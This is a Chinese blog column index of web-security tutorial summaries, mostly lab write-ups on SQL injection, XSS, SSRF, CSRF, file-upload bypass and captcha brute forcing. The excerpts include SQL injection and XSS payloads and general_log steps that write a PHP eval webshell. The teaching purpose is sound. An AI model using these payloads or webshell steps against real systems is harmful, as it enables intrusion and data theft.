![](https://img-blog.csdnimg.cn/8553984734ca443997b60d0b4d86af6a.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
网络安全
文章平均质量分 75
该专栏为基础漏洞专栏,主要记录本人当时刚刚开始学习安全的文章
猫鼠信安
安全从业三年,主攻WEB安全 | 内网渗透 | 红蓝对抗
展开
-
超详细!魔改为中文sqlmap的使用教程
Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、postgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、sybase和SAP MaxDB。Sqlmap采用了以下5中独特的SQL注入技术。基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。原创 2023-09-17 13:18:39 · 1111 阅读 · 0 评论 -
某某客户的一次勒索病毒应急响应
Lockbit在每隔被加密的目录下释放一封勒索信Restore-My-Files.txt,文件全部加密完成后,程序在桌面释放hta文件LockBit-note.hta,并为其创建注册表启动项,然后运行,弹出勒索窗口以提醒用户。最后,这个机器,只能重装系统了,客户最关心的就是有没有横向移动,入侵的原因是什么,入侵的时间,只要找到这些,基本就能交差,后续我便溜了,现场事情基本完成。美好的周六刚开始,眼睛一睁,领导就发消息,说某客户中了勒索病毒,特别着急,让我赶过去,于是就有了这篇文章。(2)及时升级更新补丁。原创 2023-04-11 11:29:43 · 943 阅读 · 4 评论 -
电脑桌面app客户端、微信公众号-小程序测试方法
电脑桌面app客户端、微信公众号-小程序测试方法原创 2023-04-10 17:45:26 · 1275 阅读 · 0 评论 -
暴力破解之验证码识别
渗透测试过程中,现在验证码越来越多,这对测试的时候遇到的阻力不小,一位大佬给我安利了一个burp插件,Captcha-killer,可以自动对验证码进行识别,从而进行暴力破解。验证码识别是使用了python的开源验证码识别接口ddddocr模块。使用burp抓包,把验证码的包发到Captcha-killer模块。本地尝试一下运行脚本,出现下面信息,代表运行成功。下载好Captcha-Killer模块,选择生成器,这样就可以进行暴力破解啦。【下载不了的,我把安装包放到文末】回到插件,点击获取验证码。原创 2023-04-10 14:20:38 · 4174 阅读 · 3 评论 -
App防抓包的四种绕过方法(详细)
平时做app渗透的适合,是不是经常会遇到burp抓不到包的问题,本文梳理了一些APP抓不到包的解决思路原创 2023-03-02 11:06:27 · 15938 阅读 · 3 评论 -
burp联动xray进行被动扫描
本文详细介绍了xray与burp进行联动的方法,被动扫描和手工测试双管齐下快速出洞,在burp上配置xray代理,将burp流量转发给xray扫描,这样便可坐收漏洞了4、不是在piliang目录下,而是在xray.exe的目录这原创 2023-03-02 10:37:02 · 928 阅读 · 0 评论 -
MSSQL反弹注入
MSSSQL注入——反弹注入我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样)我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – +select name from dbo.sysdatabases 查询系统库sysobjects 查询系统表 (xtype=‘U’)syscolumns 字段 (id= ) 指定sysobjects库中表名对应id先尝试显错注入‘ and o原创 2020-05-17 09:28:28 · 499 阅读 · 0 评论 -
SSRF攻击原理、作用、具体操作
SSRF作用原理以及具体操作什么是SSRF?服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务)攻击者能够利用目标帮助攻击者访问其他想要攻击的目标A让B帮忙访问C用一种简单的方法 -攻击者要求服务器为他访问URL在这里,example.com 从其服务器再去访问http://google.com假设他内网有许多内网服务器,我们是不是就可以访问到内网了。可以探测一些内网的信息~http原创 2020-05-12 12:13:33 · 2018 阅读 · 0 评论 -
SQL注入——POST类型
SQL注入——POST类型靶场地址原理:POST注入就是利用post传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息第一题:我们首先查看源码它直接去运行了代码,没有做任何的处理,因此,我们只需要闭合username的前面的代码,再把后面代码注释掉就可以实现数据交互我在账号框框里输入' or 1=1 #直接显示于是,我先来判断字段数依次输入代码'union select 1#'union select 1,2#'union select 1,2,3#发现只有原创 2020-05-12 12:20:52 · 1960 阅读 · 0 评论 -
ACCESS——偏移注入
偏移注入(其他数据库也可以)原理:在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。table_name.来查询,因为是通配符,可以查询到里面所有的数据,但是有长度限制,如果字段数小于表内数据数那就无法用第一题:我们先尝试url栏是否存在显错输入很明显不存在,于是我们尝试cookie注入按F12进入控制台,删掉URL栏的GET传参,在控制台输入代码document.co原创 2020-05-13 09:49:29 · 223 阅读 · 0 评论 -
宽字节注入——魔术引号的绕过
宽字节注入原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。靶场地址第一题:首先先在url栏输入’ and 1=2 %23发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码%df...原创 2020-05-06 10:13:21 · 2722 阅读 · 2 评论 -
反射型XSS—漏洞
反射型XSS—漏洞原理:利用javascript语句,进行XSS拼接网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML)1.我们输入<script>alert(1)</script>在框内寻找输出点,发现在源代码里找到了两个输出点,但是第一个输出点它把<>实体化了,没有<>的显示但是第二个就不一样了![在这里插入图片描述](https:/它的<>都没有被实体化,存原创 2020-05-25 10:02:28 · 1637 阅读 · 0 评论 -
文件上传的20种骚方法
文件解析漏洞黑名单绕过第一题:我们查看源代码,发现不准上传 .jpg .png .gif后缀名的文件于是,我们制作一个图片木马制作成功我们利用burp的抓包工具,去获取数据包修改上传文件的后缀名为.php发现文件上传成功进入图片链接,发现果然是一个php码利用菜刀进入成功进入后台第二题:同样是是上传文件,但是前端检测点不同我们同样制作图片码,利用burp抓包,修改文件后缀名为php,一样能拿下服务器第三题:我们查看图片源代码我们发现他们把以.asp .aspx .ph原创 2020-05-27 12:13:37 · 614 阅读 · 0 评论 -
Acess注入—Cookie注入
Acess注入—Cookie注入靶场地址原理:php中的$_REQUEST[] 可以获取POST|GET|COOKIE传参,可以通过burp的抓包,修改cookie的参数,也可以通过控制台,利用JS来进行cookie注入第一题:我们进去靶场随便点一个链接,进入具有id传参的界面。我们先尝试,是否能进行GET传参进行显错注入发现被禁止了,于是我们尝试cookie注入打开burp抓包去掉上面的id=171,在cookie后面加;闭合,再输入id=171,看看语句是是否执行然后放包,发现上面没原创 2020-05-11 11:31:40 · 208 阅读 · 0 评论 -
数据库外带——DNS注入
Mysql注入——DNS注入靶场地址原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志1.,我们看到靶场,首先尝试最简单的get传参,注入它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试页面正常,继续原创 2020-05-14 15:27:18 · 1151 阅读 · 0 评论 -
存储型XSS—漏洞
存储型XSS—漏洞原理:嵌入到web页面的恶意HTML会被存储到应用服务器端,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码我们先进入靶场很明显它是一个CMS,我们第一反应就是有没有通杀啊百度搜索我们先在本地搭建一个FineCMS搭建好过后,我们查看百度上找到了通杀漏洞文章找到URL栏上的数据,我们提取出来index.php?c=mail&m=test尝试在本地搭建的进行测试查看后台错误日志成功得到执行,接着我们进入Xss平台原创 2020-05-25 10:05:52 · 977 阅读 · 0 评论 -
Dom型XSS—漏洞
Dom型XSS—漏洞原理:让原本不存在Xss的地方出现Xss,利用native编码去替换js语句,让前端认为这个js语句安全我们首先在各个框框内插入<script>alert(1)</script>结果页面崩溃,再次访问发现被拦截了,于是我们尝试绕过,在url栏输入/index.php/1.txt成功绕过,继续输入<script>alert(1)</script>发现没有出现弹窗,可能不存在Xss漏洞接着我发现,在URL栏上的传参和页面上原创 2020-05-28 10:26:41 · 769 阅读 · 0 评论 -
布尔盲注
布尔盲注靶场地址原理:在没有错误回显的情况下,我们利用length() ;substr()进行字母和数字的转化,把需要获取的信息转化为可比较的数字,再利用ascii码对应的字母的值来进行数据库信息的获取。工程非常庞大,需要一点一点试出来第一题:由于没有任何的报错点,只能看到有数据,同时url栏上方是GET传参,所以我们直接再url栏上进行操作,在后方输入代码and length(data...原创 2020-05-04 10:15:30 · 201 阅读 · 0 评论 -
Oracle注入——报错注入
Oracle注入——报错注入原理:同MYSQL数据库差不多,但是一些语法不同,相比其他数据库,Oracle数据库的数据类型更加严谨,由于过度严谨,所以,我们用显错注入,会比较麻烦,于是,我们利用报错的方法,忽视数据类型,直接获取数据CTXSYS.DRITHSX.SN(user,())Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY那么要它有什么用妮?它实际上是为了满足查询语句的结构而产生比如你想查询你的用户名 select user from Dual原创 2020-05-20 08:42:22 · 1439 阅读 · 2 评论 -
盲注——延时注入
延时注入靶场地址原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对第一题:我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化" and 1=2 %23然后尝试延时注入,重新输入代码" and sleep(5) %23界面有明显的延迟,所以判定我们输入的sql代码得到了执行于是,我们输入代码,来查询数据库的长度 ...原创 2020-05-07 19:51:13 · 890 阅读 · 0 评论 -
Head注入(USERANGENT、Referer、X-forword-for)
Head注入靶场地址原理:head注入就是通过burp抓包,修改它的请求头useagent的数据来和数据库进行交互查询数据第一题:我们先查看url栏,没有get传参再尝试post传参在usename栏输入代码' or 1=1 #发现usename不行查看源代码,可以通过password传参接着我们尝试头注入,查看源代码,发*现它使用了超全局变量$uagent = $_SERVER[‘HTTP_USER_AGENT’];并且它有个if语句必须要登陆才可以插入usergent语句,我们已经原创 2020-05-11 15:55:05 · 865 阅读 · 0 评论 -
正则表达式知识概括
正则表达式知识概括很简练的语言达到字符串匹配用途:1.判断字符串是否符合某一规则(判断是否符合手机号、邮箱规则)。2.从一个字符串中找出符合规则的所有子字符串(取HTML标签名)。常用两个函数:(1)preg_match_all(正则表达式、匹配字符串、匹配到的东西放入数组)返回匹配到的次数<?php$a=preg_match_all(’/ a/’,’aaa123’) ;...原创 2020-05-06 10:41:15 · 126 阅读 · 0 评论 -
SQL语句利用日志写shell
SQL语句利用日志写shelloutfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为shell地址4.select ‘<?php eval($_POST[cmd]);原创 2020-06-24 13:38:30 · 295 阅读 · 0 评论 -
越权漏洞
越权漏洞原理:越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。目前存在着两种越权操作类型:横向越权操作(水平越权)和纵向越权(垂直越权)操作。越权一般分为水平越权和垂直越权。原创 2020-06-03 09:53:26 · 565 阅读 · 0 评论 -
CSRF—跨站请求伪造
CSRF—跨站请求伪造原理:csrf漏洞的成因就是网站的cookie在浏览器中不会过期,伪造信任用户的请求,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)1.我们打开靶场,发现是一个CMS,由于我们知道后台路径,所以我们直接进入后台登陆界面输入账号密码,进入后台然后我们点击文件管理器,点击新建文件这时,我们打开burp,在修改文件的时候,利用原创 2020-05-30 15:33:55 · 268 阅读 · 3 评论 -
表单验证
表单验证<html><meta charset="utf-8"><center><h3>后台登陆</h3><form action= "" method="POST" >账号: <input type="text" name="username"/><br/>密码: <input t...原创 2020-05-03 17:25:02 · 158 阅读 · 0 评论 -
正则表达式的运用
正则表达式的运用靶场地址原理:又称规则表达式,计算机科学的一个概念,正则表达式通常被用来检索、替换那些符合某个模式(规则的文本)这里是指将正则匹配到的值赋值给变量$Regularif判断语句,这里是指当变量$Regular有值时将输出变量key,也就是flag那么我只需要构造成能成功匹配正则的值就能成功输出flag。//是正则标识;/i指不区分大小写;zkaq指匹配字符zkaq;.通...原创 2020-05-03 17:30:34 · 122 阅读 · 0 评论 -
SQL注入——GET类型
SQL注入——GET类型靶场地址原理:sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息第一题:我们先在url栏测试一下,把id=1改成id=-1结果页面就不显示了表示存在sql注入漏洞我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合接着,我在url轮流输入 order by 1,2,3....测试出它页面字段总数在输入...原创 2020-05-03 17:44:14 · 2949 阅读 · 0 评论